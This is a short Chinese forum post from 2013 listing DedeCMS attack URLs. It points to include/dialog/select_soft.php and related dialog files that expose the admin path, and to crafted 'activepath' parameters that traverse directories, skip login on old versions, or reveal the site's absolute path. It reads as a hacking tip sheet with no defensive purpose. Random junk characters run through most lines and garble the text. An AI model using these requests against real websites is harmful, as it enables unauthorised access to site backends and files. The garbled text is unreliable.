1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理5 M9 ]* M) V+ O" p9 c- D
p: n0 z T' o! u- f- V: N员帐号,新版本的就直接转向了后台., W7 y2 z/ j) d' D5 {
. K. l4 G# W1 t0 k' _
2.include/dialog/config.php会爆出后台管理路径
" i" w9 Y" n, }3 Q0 |. K# O# O, s* s% _2 w) s1 I$ E/ P& W- p6 m) h- h
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录3 H( y0 R% {: b+ m6 E) Z
& V* O: e3 R+ y+ d4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
" `& d0 F2 [% ?4 ^$ V- R8 x, U3 t, U, V+ R* T1 Z
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉# U1 h- v( ~- K3 D" D
4 s. N: {. k( a4 m# }$ O到根目录去.不过这些版本的访问地址有些不同.# p) @$ @2 L Z' v- |9 ~$ S5 a
地址为require/dialog/select_soft.php?activepath=/././././././././
1 A' ~" T# `' i3 s& M/ J/ x( e
3 n: F, D4 J. I- `+ r% i. O! [' t" vinclude\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦../ s# I, \* d5 m4 E
存在相同问题的文件还有8 ~' K$ W% L* K- t3 w
include\dialog\select_images.php- Z( }4 _: O; \2 R4 |2 i+ c2 J4 n
include\dialog\select_media.php) l* H2 q7 Y0 q+ e. B
include\dialog\select_templets.php
" w6 K0 }4 Y- u7 L# W |
发表于 2013-4-16 16:50:43
收藏
支持
反对